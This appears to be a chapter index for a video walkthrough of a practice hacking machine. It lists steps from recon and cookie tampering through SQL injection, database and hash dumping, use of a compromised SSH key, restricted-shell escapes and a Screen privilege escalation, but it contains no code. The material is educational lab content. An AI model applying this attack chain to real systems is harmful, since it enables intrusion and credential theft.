01:30 - Begin of Recon
04:15 - Adding DNS Names to /etc/hosts
05:20 - Using Aquatone to take HTTP Screenshots of a bunch of pages
11:00 - Start of looking at FreeFlujab.htb
15:40 - Looking at HTTP Cookies we send
17:40 - Editing Cookies in Firefox
19:50 - Discovering SMTP_CONFIG, which lets us change where the mail server is
21:50 - Using FireFox to remove character restrictions on a page
24:15 - The WebPage kept resetting our cookie, using Burp to auto replace
27:30 - Standing up a SMTP Server in python to read mail
30:20 - Discovering SQL Injection
34:50 - SQL Injection confirmed, testing Union Injections
37:40 - Creating a Python Script to aid us in running SQL Injections
37:40 - Script: Running a SMTP Server in background thread
41:35 - Script: Adding ability to use arrow keys to go to previous command
46:42 - Script: Making our command prompt send HTTP Requests
52:40 - Dumping database structure from INFORMATION_SCHEMA
1:05:00 - Dumping information out of the VACCINATIONS Table
1:07:50 - User information dumped, cracking a sha256 hash
1:11:00 - Accessing a new HOSTNAME from the database (sysadmin-console-01)
1:16:00 - Logging into Ajenti
1:17:00 - Discovering Notepad can read files from the server
1:24:10 - Looks like there was a SSH Key Compromise on the box from a README File
1:27:40 - Searching the compromised debian keys for one on the box
1:29:48 - Able to SSH Into the box with the Key! However we are in restricted bash
1:30:30 - rBash escape 1: Using GTFOBins to find a way to escape restricted bash
1:32:30 - rBash escape 2: Using -t bash argument in SSH to escape restricted bash
1:33:30 - Exploiting an old version of Screen to PrivEsc!
* Second way to get a shell on the box *
1:43:40 - Creating files in /home/sysadm
1:46:40 - SSH is configured to allow public keys to also be placed in ~/access
1:48:00 - Reading Ajenti Documentation to see API lets us change file permissions
1:50:00 - Ajenti wants the CHMOD Number to be in a weird format